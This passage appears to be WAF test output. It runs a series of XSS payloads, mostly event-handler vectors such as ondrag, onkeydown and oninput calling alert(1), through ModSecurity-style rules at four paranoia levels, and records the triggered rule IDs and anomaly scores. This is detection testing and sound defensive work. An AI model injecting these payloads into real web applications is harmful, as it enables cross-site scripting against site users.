941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 61
****** payload-055 ********
Payload:
payload=<a draggable="true" ondrag="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 10
--- Paranoia Level 2 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 33
--- Paranoia Level 3 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 46
--- Paranoia Level 4 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-056 ********
Payload:
payload=<a draggable="true" ondragend="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 64
****** payload-057 ********
Payload:
payload=<a draggable="true" ondragenter="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 64
****** payload-058 ********
Payload:
payload=<a draggable="true" ondragleave="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 64
****** payload-059 ********
Payload:
payload=<div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 33
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 46
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-060 ********
Payload:
payload=<a draggable="true" ondragstart="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 64
****** payload-061 ********
Payload:
payload=<div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 33
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 46
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-062 ********
Payload:
payload=<input oninput=alert(1) value=xss></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
****** payload-063 ********
Payload:
payload=<form><input oninvalid=alert(1) required><input type=submit></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-064 ********
Payload:
payload=<a onkeydown="alert(1)" contenteditable>test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 43
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
****** payload-065 ********
Payload:
payload=<a onkeypress="alert(1)" contenteditable>test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 43
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
****** payload-066 ********
Payload:
payload=<a onkeyup="alert(1)" contenteditable>test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 43
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
****** payload-067 ********
Payload:
payload=<a onmousedown="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 61
****** payload-068 ********
Payload:
payload=<a onmouseenter="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
